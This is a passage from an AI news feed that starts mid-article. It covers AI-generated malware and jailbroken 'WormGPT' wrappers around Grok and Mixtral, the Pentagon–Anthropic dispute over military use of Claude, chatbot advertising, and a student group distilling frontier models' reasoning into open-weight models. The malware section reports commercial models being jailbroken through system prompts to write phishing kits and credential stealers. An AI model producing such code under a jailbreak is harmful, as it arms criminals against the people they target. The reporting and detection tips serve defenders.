<td>Spear-phishing, undetectable malware, phishing pages</td> </tr> <tr> <td>WormGPT variants</td> <td>~EUR 60/subscription</td> <td>Telegram, BreachForums</td> <td>Phishing, PowerShell credential stealers, polymorphic malware</td> </tr> </tbody> </table> <p>These are not bespoke models. Security researchers at Cato Networks found that new WormGPT variants are wrappers around <strong>xAI's Grok</strong> and <strong>Mistral's Mixtral</strong> with jailbreak system prompts. One variant (keanu-WormGPT) was posted on BreachForums in February 2025. The barrier to entry is a Telegram account and a credit card.</p> <blockquote> <p>&quot;In 2025, AI gained a foothold in cybercrime. In 2026, it will dominate,&quot; stated Malwarebytes' ThreatDown 2026 State of Malware report.</p></blockquote> <h2 id="how-to-spot-ai-generated-malware">How to Spot AI-Generated Malware</h2> <p>The irony of AI-generated malware is that it is often easier to analyze than human-written malware. Traditional malware authors deliberately obscure their code. AI does the opposite:</p> <ul> <li><strong>Excessive inline comments</strong> explaining every line of code</li> <li><strong>Native-language function names</strong> and variables</li> <li><strong>README files</strong> with attack execution instructions bundled with the malware</li> <li><strong>Hardcoded decryption keys</strong>, server URLs, and C2 addresses left in code</li> <li><strong>&quot;Educational/Research Purpose Only&quot; disclaimers</strong> - residue from jailbreak prompts</li> <li><strong>Typos</strong> like &quot;readme.txtt&quot; instead of &quot;readme.txt&quot; - &quot;a mistake that a threat actor would never make,&quot; as Unit 42's Middagh noted</li> <li><strong>Accidental inclusion of decryption tools</strong> within ransomware packages (the Susvsex VS Code extension shipped both its ransomware and two separate decryptors)</li> </ul> <h2 id="the-scale">The Scale</h2> <p>The numbers paint a clear picture of acceleration:</p> <ul> <li><strong>87%</strong> of global organizations experienced AI-enabled cyberattacks in 2025</li> <li><strong>82.6%</strong> of phishing emails now use AI in some form</li> <li><strong>53% year-over-year increase</strong> in extorted ransomware victims (Check Point 2026)</li> <li><strong>4x faster</strong> attacks - fastest intrusions now reach data exfiltration in 72 minutes (Unit 42)</li> <li><strong>$5.72 million</strong> average cost of an AI-powered breach (13% increase)</li> <li><strong>36%</strong> of malicious webpages now use runtime LLM assembly to generate attack payloads dynamically</li> </ul> <p>The React2Shell exploit demonstrated the endpoint of this trend: a single LLM prompting session generated a functioning exploit framework that compromised approximately 91 hosts. The profit was trivial (0.015 XMR, roughly $5). The precedent is not.</p> <h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2> <p>Law enforcement has made arrests in AI-adjacent cybercrime - Operation Red Card 2.0 resulted in 651 suspects detained across 16 African countries - but no specific arrests for AI-generated malware creation have been reported. The legal framework has not caught up. Few police academies train cadets on identifying AI-generated threats. Miami Dade College announced it will be one of the first U.S. police academies to do so.</p> <p>The defensive asymmetry is real. Organizations using security AI and automation experience $1.8 million lower average breach costs. But only about half the organizations Unit 42 works with have any limits on AI usage at all.</p> <hr> <p>The pattern emerging from these samples is bifurcated. Sophisticated actors like the VoidLink developer use AI to produce advanced malware at unprecedented speed. Unskilled actors like the Sicarii developers produce malware with catastrophic bugs they cannot fix. Both categories are growing. The <a href="/news/vibe-coding-security-69-vulnerabilities/">security implications for AI-generated code</a> extend beyond legitimate development - the same tools that let engineers <a href="/news/spotify-best-developers-stopped-writing-code/">ship code from their commute</a> let threat actors ship malware from theirs.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.theregister.com/2026/01/08/criminals_vibe_coding_malware/">Criminals are vibe-coding malware - The Register</a></li> <li><a href="https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/">VoidLink: Early AI-Generated Malware Framework - Check Point Research</a></li> <li><a href="https://www.halcyon.ai/blog/a-ransomware-reversal-sicarii-cant-decrypt-but-halcyon-can">Sicarii Ransomware Can't Decrypt But Halcyon Can - Halcyon</a></li> <li><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools">Google GTIG AI Threat Tracker</a></li> <li><a href="https://www.welivesecurity.com/en/eset-research/promptspy-ushers-in-era-android-threats-using-genai/">PromptSpy: First Android Threat Using GenAI - ESET</a></li> <li><a href="https://www.darktrace.com/blog/ai-llm-generated-malware-used-to-exploit-react2shell">AI LLM-Generated Malware Used to Exploit React2Shell - Darktrace</a></li> <li><a href="https://abnormal.ai/blog/ghostgpt-uncensored-ai-chatbot">GhostGPT Uncensored AI Chatbot - Abnormal Security</a></li> <li><a href="https://www.threatdown.com/blog/machine-scale-cybercrime-the-2026-state-of-malware-report/">Machine-Scale Cybercrime: 2026 State of Malware - ThreatDown</a></li> <li><a href="https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/">Real-Time Malicious JavaScript Through LLMs - Unit 42</a></li> </ul>Elena MarchettiNewsThe Pentagon Wants Claude to Fight Wars. Anthropic Said No. Now There's a $200 Million Standoff.https://awesomeagents.ai/news/pentagon-anthropic-claude-military-ai-showdown/Sat, 21 Feb 2026 13:14:00 +0100https://awesomeagents.ai/news/pentagon-anthropic-claude-military-ai-showdown/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>The Pentagon used Anthropic's Claude AI during the January operation to capture Venezuelan President Nicolas Maduro, reportedly via defense contractor Palantir</li> <li>Anthropic questioned Palantir about the deployment, prompting fury from the Department of War, which is now threatening to cancel the company's $200 million contract</li> <li>Defense Secretary Pete Hegseth is considering designating Anthropic a &quot;supply chain risk&quot; - a label normally reserved for foreign adversaries like Huawei</li> <li>The core dispute: the Pentagon demands unrestricted &quot;any lawful use&quot; of AI models, while Anthropic refuses to drop its bans on mass surveillance and autonomous weapons</li> </ul> </div> <p>An AI company built its brand on safety. The U.S. military built its AI strategy on speed. When their interests collided during a lethal raid in Caracas, the fallout exposed the deepest rift yet between Silicon Valley's ethical commitments and Washington's expanding appetite for AI-powered warfare.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>The Pentagon used Anthropic's Claude AI during the January operation to capture Venezuelan President Nicolas Maduro, reportedly via defense contractor Palantir</li> <li>Anthropic questioned Palantir about the deployment, prompting fury from the Department of War, which is now threatening to cancel the company's $200 million contract</li> <li>Defense Secretary Pete Hegseth is considering designating Anthropic a &quot;supply chain risk&quot; - a label normally reserved for foreign adversaries like Huawei</li> <li>The core dispute: the Pentagon demands unrestricted &quot;any lawful use&quot; of AI models, while Anthropic refuses to drop its bans on mass surveillance and autonomous weapons</li> </ul> </div> <p>An AI company built its brand on safety. The U.S. military built its AI strategy on speed. When their interests collided during a lethal raid in Caracas, the fallout exposed the deepest rift yet between Silicon Valley's ethical commitments and Washington's expanding appetite for AI-powered warfare.</p> <h2 id="what-happened-in-venezuela">What Happened in Venezuela</h2> <p>In January 2026, U.S. forces carried out an operation to capture Venezuelan President Nicolas Maduro. According to a Wall Street Journal investigation, Anthropic's Claude was deployed during the operation through the company's partnership with Palantir Technologies, a longtime Pentagon contractor. Venezuela's defense ministry reported approximately 83 deaths.</p> <p>The exact role Claude played remains classified. Anthropic's AI is capable of tasks ranging from analyzing intelligence documents to, in theory, guiding autonomous drone systems. What is known is that after news of the raid broke, an Anthropic executive contacted a senior Palantir executive to ask whether Claude had been used.</p> <blockquote> <p>&quot;It was raised in such a way to imply that they might disapprove of their software being used, because obviously there was kinetic fire during that raid, people were shot,&quot; a senior Pentagon official told Axios.</p></blockquote> <p>That phone call set off a chain reaction that has now escalated into the most significant confrontation between an AI company and the U.S. government to date.</p> <h3 id="anthropics-position">Anthropic's Position</h3> <p>Anthropic has maintained that Claude's usage policies prohibit two specific applications: mass domestic surveillance and fully autonomous weapons. The company has not alleged that the Venezuela operation violated those policies. An Anthropic spokesperson told NBC News: &quot;Anthropic has not discussed the use of Claude for specific operations with the Department of War.&quot;</p> <p>CEO Dario Amodei, in his January 2026 essay <a href="https://www.darioamodei.com/essay/the-adolescence-of-technology">&quot;The Adolescence of Technology,&quot;</a> went further, arguing that &quot;large-scale AI-facilitated surveillance should be considered a crime against humanity.&quot; He has repeatedly called for guardrails on autonomous lethal operations - a position that puts him on a direct collision course with the Pentagon's current leadership.</p> <h3 id="the-pentagons-response">The Pentagon's Response</h3> <p>The reaction from the Department of War has been blunt. Pentagon CTO Emil Michael is urging Anthropic to &quot;cross the Rubicon&quot; - to make an irreversible commitment to supporting military operations without vendor-imposed restrictions.</p> <blockquote> <p>&quot;If someone wants to make money from the government... those guardrails ought to be tuned for our use cases - so long as they're lawful,&quot; Michael told DefenseScoop. &quot;What we're not going to do is let any one company dictate a new set of policies above and beyond what Congress has passed.&quot;</p></blockquote> <p>Defense Secretary Pete Hegseth has reportedly promised the Pentagon will not &quot;employ AI models that won't allow you to fight wars.&quot; Pentagon spokesman Sean Parnell added: &quot;Our nation requires that our partners be willing to help our warfighters win in any fight.&quot;</p> <h2 id="the-200-million-question">The $200 Million Question</h2> <p>The contract at the center of this dispute, signed in summer 2025, is worth up to $200 million. It allows the military to deploy Claude alongside ChatGPT, Gemini, and Grok through the Pentagon's GenAI.mil platform, which now has over 1.1 million active users across the Department of War's three million personnel.</p> <p>But months of negotiations over usage terms have stalled. The Pentagon wants unrestricted use for &quot;any lawful purpose.&quot; Anthropic wants to maintain its red lines on surveillance and autonomous weapons. Neither side has budged.</p> <table> <thead> <tr> <th>Stakeholder</th> <th>Position</th> <th>Red Lines</th> </tr> </thead> <tbody> <tr> <td>Anthropic</td> <td>Ethical guardrails must remain</td> <td>No mass surveillance, no autonomous weapons</td> </tr> <tr> <td>Pentagon (DoW)</td> <td>&quot;Any lawful use&quot; without vendor restrictions</td> <td>No AI company should dictate military policy</td> </tr> <tr> <td>Palantir</td> <td>Caught in the middle as integration partner</td> <td>Has not publicly taken sides</td> </tr> </tbody> </table> <h3 id="the-supply-chain-risk-threat">The &quot;Supply Chain Risk&quot; Threat</h3> <p>Senior Pentagon officials are now floating a designation that carries enormous consequences: labeling Anthropic a &quot;supply chain risk.&quot; This is the same classification the U.S. applied to Huawei in 2019, effectively blacklisting the Chinese telecom giant from American networks.</p> <p>One senior official told Axios: &quot;It will be an enormous pain in the ass to disentangle, and we are going to make sure they pay a price for forcing our hand like this.&quot; A Fortune report from today (February 21) confirms the Trump administration remains &quot;livid&quot; about Amodei's stance.</p> <p>For Anthropic, which has raised over $10 billion in funding and is valued at roughly $61 billion, losing a $200 million Pentagon contract is financially survivable. Being designated a supply chain risk is not - it would effectively bar the company from any government work and could spook enterprise customers in regulated industries.</p> <h2 id="the-broader-ai-safety-dilemma">The Broader AI Safety Dilemma</h2> <p>This confrontation did not emerge in a vacuum. It is the logical endpoint of tensions that have been building since the Pentagon began aggressively integrating commercial AI into military operations.</p> <p>In January 2026, the Department of War released a new AI strategy mandating that contractors eliminate company-specific constraints and allow unrestricted military use. Five of six military branches have adopted GenAI.mil as their primary AI platform, and the Pentagon is adding OpenAI's ChatGPT to the system.</p> <p>The question Anthropic's standoff forces is straightforward: can an AI company sell to the military while maintaining ethical boundaries the military does not accept?</p> <h3 id="what-it-means-for-the-industry">What It Means for the Industry</h3> <p>OpenAI, Google, and xAI have not publicly challenged the Pentagon's &quot;any lawful use&quot; framework. If Anthropic capitulates, the precedent is set: <a href="/guides/ai-safety-and-alignment-explained/">AI safety commitments</a> are marketing copy, not contractual obligations. If Anthropic holds firm and gets blacklisted, the message to every other AI company is equally clear: ethics are a luxury the defense market does not tolerate.</p> <p>The irony is not lost on the AI community. A top post on the Claude subreddit praised Anthropic: &quot;Good job Anthropic, you just became the top closed AI company in my books.&quot; Consumer sentiment and government sentiment are pulling in opposite directions.</p> <h2 id="what-it-does-not-tell-us">What It Does Not Tell Us</h2> <p>Several critical questions remain unanswered.</p> <h3 id="how-was-claude-actually-used">How Was Claude Actually Used?</h3> <p>The Wall Street Journal report established that Claude was deployed, but the specifics are classified. Was it analyzing intelligence reports? Planning logistics? Coordinating drone movements? The severity of the usage policy question depends entirely on the answer, and neither Palantir nor the Pentagon has provided one.</p> <h3 id="will-other-ai-companies-face-the-same-pressure">Will Other AI Companies Face the Same Pressure?</h3> <p>OpenAI's ChatGPT and Google's Gemini are already on GenAI.mil. Neither has <a href="/reviews/chatgpt-vs-claude-vs-gemini/">publicly imposed the same restrictions</a> Anthropic has. Whether they have private guardrails - and whether the Pentagon would tolerate them - is unknown.</p> <h3 id="what-happens-to-palantir">What Happens to Palantir?</h3> <p>Palantir is the critical intermediary. It integrated Claude into military systems and is now caught between its largest government customer and one of its AI partners. Fast Company reports the company has not publicly taken sides, a silence that cannot last indefinitely.</p> <hr> <p>This is no longer a theoretical debate about <a href="/guides/ai-safety-and-alignment-explained/">AI ethics in defense applications</a>. It is a live, $200 million contract dispute with real consequences for how AI gets used in lethal operations. Anthropic built <a href="/reviews/review-claude-opus-4-6/">Claude</a> on the promise that safety was not optional. The Pentagon is now testing whether the company meant it. The answer will shape military AI policy for years to come - and every other AI lab is watching.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.axios.com/2026/02/15/claude-pentagon-anthropic-contract-maduro">Pentagon threatens to cut off Anthropic in AI safeguards dispute - Axios</a></li> <li><a href="https://futurism.com/artificial-intelligence/pentagon-issues-threat-anthropic">Pentagon Issues Threat to Anthropic - Futurism</a></li> <li><a href="https://www.nbcnews.com/tech/security/anthropic-ai-defense-war-venezuela-maduro-rcna259603">Tensions between Pentagon and AI giant Anthropic reach boiling point - NBC News</a></li> <li><a href="https://defensescoop.com/2026/02/19/pentagon-anthropic-dispute-military-ai-hegseth-emil-michael/">Pentagon CTO urges Anthropic to 'cross the Rubicon' on military AI - DefenseScoop</a></li> <li><a href="https://fortune.com/2026/02/21/trump-team-livid-dario-amodei-dept-of-war-using-claude-war/">Trump team livid about Dario Amodei's principled stand - Fortune</a></li> <li><a href="https://www.trtworld.com/article/1a8992ecd5ee">US military used Anthropic's Claude AI in Venezuela operation - TRT World</a></li> <li><a href="https://www.inc.com/kevin-haynes/anthropic-blasts-pentagons-use-of-its-ai-tool-in-venezuela-raid-may-void-200m-contract/91303320">Anthropic blasts Pentagon's use of Claude in Venezuela raid - Inc.</a></li> <li><a href="https://www.fastcompany.com/91493997/palantir-caught-in-middle-anthropic-pentagon-feud">Palantir caught in the middle of Anthropic-Pentagon feud - Fast Company</a></li> <li><a href="https://thehill.com/policy/defense/5744403-anthropic-pentagon-ai-dispute/">Anthropic on shaky ground with Pentagon after Maduro raid - The Hill</a></li> <li><a href="https://www.darioamodei.com/essay/the-adolescence-of-technology">Dario Amodei - The Adolescence of Technology</a></li> </ul>Elena MarchettiNewsThe AI Advertising Split: OpenAI Goes All In on Ads While Rivals Refusehttps://awesomeagents.ai/news/ai-chatbot-advertising-war/Sat, 21 Feb 2026 13:03:00 +0100https://awesomeagents.ai/news/ai-chatbot-advertising-war/<p>Three companies. Three business models. One question that will determine who controls the next generation of consumer technology: should your AI assistant sell you things?</p><p>Three companies. Three business models. One question that will determine who controls the next generation of consumer technology: should your AI assistant sell you things?</p> <p>In the span of two weeks this February, the AI industry fractured along a fault line that has nothing to do with model performance, context windows, or benchmark scores. It is about money - specifically, where it comes from.</p> <table> <thead> <tr> <th>Company</th> <th>Ad Strategy</th> <th>Revenue Model</th> <th>Minimum Ad Spend</th> <th>CPM</th> </tr> </thead> <tbody> <tr> <td>OpenAI (ChatGPT)</td> <td>Ads live since Feb 9</td> <td>Subscriptions + Ads</td> <td>$200,000</td> <td>$60</td> </tr> <tr> <td>Anthropic (Claude)</td> <td>Ad-free pledge, Super Bowl campaign</td> <td>Subscriptions + Enterprise</td> <td>N/A</td> <td>N/A</td> </tr> <tr> <td>Perplexity</td> <td>Abandoned ads Feb 18</td> <td>Subscriptions + Enterprise</td> <td>N/A</td> <td>N/A</td> </tr> <tr> <td>Google (Gemini)</td> <td>Denies plans despite advertiser briefings</td> <td>Ads (Search) + Subscriptions</td> <td>Unknown</td> <td>Unknown</td> </tr> </tbody> </table> <h2 id="openai-pulls-the-trigger">OpenAI Pulls the Trigger</h2> <p>On February 9, OpenAI began showing sponsored content to free-tier and Go ($8/month) ChatGPT users in the United States. The ads appear below responses, clearly labeled as &quot;sponsored,&quot; and are matched to conversation topics. Someone researching recipes might see a grocery delivery promotion. A coding question could surface a developer tool.</p> <p>The pricing tells you everything about how OpenAI views its position. At $60 CPM - three times what Meta charges - and a $200,000 minimum commitment, this is not a product for small businesses. It is a premium play targeting brands willing to bet that conversational context is worth more than a social media scroll.</p> <blockquote> <p>&quot;Ads do not influence ChatGPT's answers. Ads run on separate systems from the chat model, and advertisers have no ability to shape, rank, or alter ChatGPT's responses,&quot; OpenAI stated in its announcement.</p></blockquote> <h3 id="the-financial-pressure">The Financial Pressure</h3> <p>The math explains the move. OpenAI's annual recurring revenue hit $20 billion in 2025, tripling from $6 billion the year prior. But the company's own internal forecasts project a $14 billion loss in 2026 - roughly three times worse than 2025 losses. Revenue projections of $30 billion for 2026 still leave a massive gap when you are burning cash at this rate. When your costs grow faster than your subscriptions, advertising is the obvious lever.</p> <h2 id="anthropic-fires-back-with-a-super-bowl-ad">Anthropic Fires Back With a Super Bowl Ad</h2> <p>Five days before ChatGPT ads went live, Anthropic launched what may be the most expensive counter-positioning move in AI history: a multi-million dollar Super Bowl campaign titled &quot;A Time and a Place.&quot;</p> <p>The four spots - titled &quot;Deception,&quot; &quot;Betrayal,&quot; &quot;Treachery,&quot; and &quot;Violation&quot; - each showed a helpful AI assistant mid-conversation, abruptly pivoting to pitch unrelated products. One featured a man asking for workout advice and getting a robotic sales pitch for shoe insoles. The tagline: &quot;Ads are coming to AI. But not to Claude.&quot;</p> <p>Anthropic's reasoning is straightforward. Internal analysis found that a significant share of <a href="/reviews/review-claude-opus-4-6/">Claude</a> conversations involve sensitive or deeply personal topics. An advertising model would create incentives to optimize for engagement and time spent rather than usefulness.</p> <blockquote> <p>&quot;We want Claude to act unambiguously in our users' interests,&quot; Anthropic stated. &quot;A conversation with Claude should be a space to think, not a space to be sold to.&quot;</p></blockquote> <h3 id="altman-responds">Altman Responds</h3> <p>OpenAI CEO Sam Altman did not take it well. He called Anthropic's ads &quot;funny&quot; but &quot;clearly dishonest&quot; and &quot;deceptive,&quot; arguing that OpenAI would &quot;obviously never run ads in the way Anthropic depicts them.&quot; The exchange devolved into what TechCrunch described as a &quot;novella-sized rant&quot; that included calling his rival &quot;authoritarian.&quot; The two CEOs later <a href="/news/altman-and-amodei-refuse-to-hold-hands-at-india-ai-summit/">refused to hold hands</a> at the India AI Impact Summit - a moment that perfectly captured the state of the relationship.</p> <h2 id="perplexity-walks-away-from-the-table">Perplexity Walks Away From the Table</h2> <p>Then, on February 18, Perplexity quietly did something more significant than either Super Bowl ad or ad launch: it abandoned advertising entirely.</p> <p>Perplexity was among the first generative AI companies to test ads back in 2024, placing sponsored answers beneath chatbot responses. It generated roughly $20,000 in ad revenue that year - less than 0.1% of its $34 million total revenue. By late 2024, the company was already phasing ads out. This month, executives confirmed no plans to revisit them.</p> <p>The reasoning cuts to the core of what makes AI different from traditional search, as covered in our <a href="/tools/best-ai-search-engines-2026/">AI search engine comparison</a>. Google serves a list of links. Users have spent two decades learning to distinguish organic results from paid placements. An AI chatbot gives you one synthesized answer. There is no list to scroll past.</p> <blockquote> <p>&quot;A user needs to believe this is the best possible answer, to keep using the product and be willing to pay for it,&quot; a Perplexity executive explained. &quot;We are in the accuracy business, and the business is giving the truth, the right answers.&quot;</p></blockquote> <h3 id="the-numbers-work-without-ads">The Numbers Work Without Ads</h3> <p>Perplexity now reports 780 million monthly queries, over 100 million users, and annualized revenue of approximately $200 million, driven by subscription tiers ranging from $20 to $200 per month. The company is ramping enterprise sales, targeting finance professionals, CEOs, and doctors - high-value users willing to pay for reliable answers. Five people on the enterprise sales team, with plans to expand aggressively.</p> <h2 id="the-google-wildcard">The Google Wildcard</h2> <p>Google occupies the strangest position in this split. Adweek reported in December 2025 that Google representatives told at least two advertising clients that Gemini ad placements were &quot;targeted for a 2026 rollout.&quot; Google's VP of Global Ads Dan Taylor then publicly denied it, calling the report the product of &quot;uninformed, anonymous sources.&quot;</p> <p>The contradiction is telling. Google already runs ads in AI Overviews and recently launched a shopping ad format inside AI Mode, which reaches over 75 million daily users. But Gemini - the standalone chatbot competing with <a href="/tools/chatgpt-vs-claude-vs-gemini/">ChatGPT and Claude</a> - remains ad-free for now. Google appears to be hedging, watching whether OpenAI's ad experiment alienates users before committing.</p> <h2 id="counter-argument">Counter-Argument</h2> <p>The bull case for AI advertising is simple: it works everywhere else. Google built a $300 billion business on search ads. Meta built a $130 billion business on social ads. The pattern is consistent - free access funded by advertising beats paid access for mass adoption every time.</p> <p>OpenAI's $60 CPM also suggests something that subscription purists miss: conversational context may be genuinely more valuable to advertisers than any other format. When a user tells ChatGPT &quot;I'm planning a trip to Japan in March,&quot; the intent signal is stronger than any search query or social media profile. If the ads truly do not influence the model's answers, the user experience trade-off could be minimal.</p> <p>And there is the access argument. OpenAI explicitly frames advertising as a way to keep ChatGPT free for hundreds of millions of users who cannot or will not pay $20 per month. Anthropic's ad-free pledge sounds principled until you ask who gets locked out when the only business model is subscriptions.</p> <hr> <h2 id="what-the-market-is-missing">What the Market Is Missing</h2> <p>The real story is not about ads. It is about what advertising does to product incentives over time.</p> <p>Every ad-supported platform in history has eventually optimized for engagement over utility. Facebook did not start with algorithmic feeds designed to maximize time-on-site. Google did not start with sponsored results that look nearly identical to organic ones. These changes happened gradually, driven by the same quarterly revenue pressure that will eventually apply to OpenAI.</p> <p>Anthropic and Perplexity are making a bet that AI is different - that the relationship between user and model is intimate enough that advertising breaks the product in ways it never broke search or social media. It is an expensive bet. Anthropic spent millions on a Super Bowl campaign to make it. Perplexity walked away from an entire revenue category.</p> <p>The market will decide who was right. But if you want to know where an AI company is headed, do not read its <a href="/leaderboards/overall-llm-rankings-feb-2026/">benchmark scores</a>. Read its revenue model. The money always tells the truth.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://techcrunch.com/2026/02/09/chatgpt-rolls-out-ads/">ChatGPT rolls out ads - TechCrunch</a></li> <li><a href="https://www.adweek.com/media/exclusive-openai-confirms-200000-minimum-commitment-for-chatgpt-ads/">OpenAI Confirms $200,000 Minimum Commitment for ChatGPT Ads - Adweek</a></li> <li><a href="https://www.macrumors.com/2026/02/18/perplexity-abandons-ai-advertising/">Perplexity Abandons AI Advertising - MacRumors</a></li> <li><a href="https://searchengineland.com/perplexity-stops-testing-advertising-469452">Perplexity stops testing advertising - Search Engine Land</a></li> <li><a href="https://www.macrumors.com/2026/02/04/anthropic-clause-no-ads/">Anthropic Promises Claude Will Remain Ad-Free - MacRumors</a></li> <li><a href="https://www.cnbc.com/2026/02/04/anthropic-no-ads-claude-chatbot-openai-chatgpt.html">Anthropic takes aim at OpenAI's ad push in Super Bowl commercial - CNBC</a></li> <li><a href="https://techcrunch.com/2026/02/04/sam-altman-got-exceptionally-testy-over-claude-super-bowl-ads/">Sam Altman got exceptionally testy over Claude Super Bowl ads - TechCrunch</a></li> <li><a href="https://www.adweek.com/media/google-gemini-ads-2026/">Google Tells Advertisers It'll Bring Ads to Gemini in 2026 - Adweek</a></li> <li><a href="https://searchengineland.com/google-corrects-report-claiming-ads-are-coming-to-gemini-in-2026-465856">Google denies ads are coming to Gemini in 2026 - Search Engine Land</a></li> <li><a href="https://fortune.com/2026/02/20/openai-revenue-forecast-280-billion-2030-capex-sam-altman/">OpenAI forecasts its revenue will top $280 billion in 2030 - Fortune</a></li> <li><a href="https://www.pymnts.com/artificial-intelligence-2/2026/openais-annual-recurring-revenue-tripled-to-20-billion-in-2025/">OpenAI's ARR Tripled to $20 Billion in 2025 - PYMNTS</a></li> </ul>Daniel OkaforNewsA Group of College Students Distilled Claude, GPT, and Gemini Into Open-Source Models for $52https://awesomeagents.ai/news/teichai-distills-frontier-models-open-source/Sat, 21 Feb 2026 13:00:00 +0100https://awesomeagents.ai/news/teichai-distills-frontier-models-open-source/<p>Four people. 250 training samples. $52.30 in API costs. That is what it took for <a href="https://huggingface.co/TeichAI">TeichAI</a>, a non-profit group of college students, to distill Claude Opus 4.5's reasoning patterns into open-weight models that have been downloaded over 67,000 times on Hugging Face.</p><p>Four people. 250 training samples. $52.30 in API costs. That is what it took for <a href="https://huggingface.co/TeichAI">TeichAI</a>, a non-profit group of college students, to distill Claude Opus 4.5's reasoning patterns into open-weight models that have been downloaded over 67,000 times on Hugging Face.</p> <p>The group has published 102 models and 41 datasets, systematically distilling outputs from Claude 4.5 Opus, GPT-5.2, Gemini 3 Pro, DeepSeek V3.2, and Kimi K2 into smaller open-source bases like Qwen3, GLM-4.7, Nemotron, and Devstral. Their tagline is &quot;Collect. Distill. Release.&quot; They mean it literally.</p> <h2 id="how-it-works">How It Works</h2> <p>TeichAI's process is not knowledge distillation in the traditional ML sense - there are no logits, no teacher-student training loops, no access to model internals. What they do is closer to behavior cloning through synthetic data.</p> <p>The pipeline:</p> <ol> <li><strong>Generate prompts</strong> - Using <a href="https://github.com/bobthe144th/PromptGen">PromptGen</a>, an open-source tool one of their members built, they generate hundreds of complex reasoning problems spanning coding, science, and research tasks</li> <li><strong>Collect responses</strong> - Send those prompts to a frontier model's API (Claude Opus 4.5, GPT-5.2, etc.) with reasoning effort set to high, capturing the full chain-of-thought output including <code>&lt;think&gt;</code> tags</li> <li><strong>Package the dataset</strong> - The raw prompt-response pairs become a JSONL training dataset. Their Claude dataset contains 250 samples totaling 2.13 million tokens, generated for $52.30</li> <li><strong>Fine-tune</strong> - Using <a href="https://github.com/unslothai/unsloth">Unsloth</a> for supervised fine-tuning (SFT), they train open-weight base models on this data. Convergence happens fast - 400 to 600 training steps</li> </ol> <p>The key insight is that they are not trying to make a small model as smart as Claude. They are trying to make it <em>reason like</em> Claude - adopting the structured thinking patterns, the step-by-step problem decomposition, the self-correction habits that show up in extended thinking outputs.</p> <p>Developer armand0e, one of the four members, put it plainly in a Hugging Face discussion: &quot;not a knowledge distillation or a full scale distillation by any means.&quot; It is reasoning pattern transfer on a shoestring budget.</p> <h2 id="the-model-inventory">The Model Inventory</h2> <p>TeichAI has distilled across nearly every major frontier model into a range of open-weight architectures:</p> <table> <thead> <tr> <th>Model</th> <th>Base</th> <th>Parameters</th> <th>Source</th> <th>Monthly Downloads</th> </tr> </thead> <tbody> <tr> <td>GLM-4.7-Flash-Claude-Opus-4.5-High-Reasoning-Distill</td> <td>GLM-4.7</td> <td>30B</td> <td>Claude 4.5 Opus</td> <td>67,330</td> </tr> <tr> <td>Qwen3-14B-Claude-4.5-Opus-High-Reasoning-Distill</td> <td>Qwen3</td> <td>14B</td> <td>Claude 4.5 Opus</td> <td>8,740</td> </tr> <tr> <td>Devstral-Small-2505-Deepseek-V3.2-Speciale-Distill</td> <td>Devstral</td> <td>24B</td> <td>DeepSeek V3.2</td> <td>5,990</td> </tr> <tr> <td>Qwen3-32B-Kimi-K2-Thinking-Distill</td> <td>Qwen3</td> <td>32B</td> <td>Kimi K2</td> <td>4,920</td> </tr> <tr> <td>Qwen3-4B-Thinking-2507-GPT-5.1-Codex-Max-Distill</td> <td>Qwen3</td> <td>4B</td> <td>GPT-5.1</td> <td>1,400</td> </tr> </tbody> </table> <p>The Claude 4.5 Opus collection alone spans 15 releases across GLM, Qwen3 (4B, 8B, 14B), and Nemotron architectures. A GPT 5.2 collection is in progress.</p> <p>Every model ships in GGUF format with quantizations from 2-bit to 16-bit, designed for local deployment on consumer hardware. The 14B Qwen3 variant fits in 9 GB at Q4 quantization - comfortably within the reach of a 16 GB laptop.</p> <h2 id="what-the-benchmarks-actually-show">What the Benchmarks Actually Show</h2> <p>The GLM-4.7 Claude distillation is the only model with published benchmarks, evaluated at 4-bit quantization using LM Evaluation Harness:</p> <table> <thead> <tr> <th>Benchmark</th> <th>Base Model</th> <th>Distilled</th> <th>Change</th> </tr> </thead> <tbody> <tr> <td>GPQA Diamond</td> <td>0.2626</td> <td>0.2929</td> <td><strong>+11.5%</strong></td> </tr> <tr> <td>Winogrande</td> <td>0.4688</td> <td>0.5043</td> <td><strong>+7.6%</strong></td> </tr> <tr> <td>MMLU</td> <td>0.2295</td> <td>0.2407</td> <td><strong>+4.9%</strong></td> </tr> <tr> <td>IFEval</td> <td>0.1091</td> <td>0.1128</td> <td><strong>+3.4%</strong></td> </tr> <tr> <td>ARC Challenge</td> <td>0.2244</td> <td>0.2176</td> <td>-3.0%</td> </tr> <tr> <td>HellaSwag</td> <td>0.2578</td> <td>0.2567</td> <td>-0.4%</td> </tr> <tr> <td>TruthfulQA</td> <td>0.4676</td> <td>0.4668</td> <td>-0.2%</td> </tr> </tbody> </table> <p>Seven wins, zero losses in the head-to-head against the base model. The average improvement is modest - about one percentage point across the board. The GPQA Diamond result is the standout: an 11.5% improvement on graduate-level reasoning questions, which is exactly where you would expect reasoning distillation to have the most impact.</p> <p>But let us be honest about what these numbers mean. An MMLU score of 0.24 is not competitive with frontier models. A GPQA score of 0.29 is not either. The distillation improves the base model's reasoning ability in measurable ways, but it does not transform a 30B open-weight model into Claude. It transfers style and structure, not capability.</p> <p>MMLU subject-level breakdowns show where the gains concentrate: anatomy (+6.7%), clinical knowledge (+5.3%), philosophy (+4.1%), jurisprudence (+4.6%). These are domains where structured reasoning - the thing Claude's thinking traces demonstrate - matters most.</p> <h2 id="what-users-report">What Users Report</h2> <p>The 67,000 downloads have generated enough real-world feedback to paint an honest picture.</p> <p>The positive case: users report the model produces more structured, thoughtful responses than the base GLM-4.7. The reasoning traces give it a distinctive &quot;Claude-like&quot; quality in how it approaches problems - laying out assumptions, considering edge cases, self-correcting.</p> <p>The negative case is instructive. Multiple users on Hugging Face reported the model producing extended, irrelevant monologues when given simple inputs. One user described &quot;verbal diarrhea&quot; - the model launching into lectures about unrelated topics when asked basic questions. The cause is straightforward: the training data consists entirely of complex reasoning problems with long, detailed responses. The model learned to always produce that kind of output, even when a two-word answer would suffice.</p> <p>Coding performance is another weak spot. One user 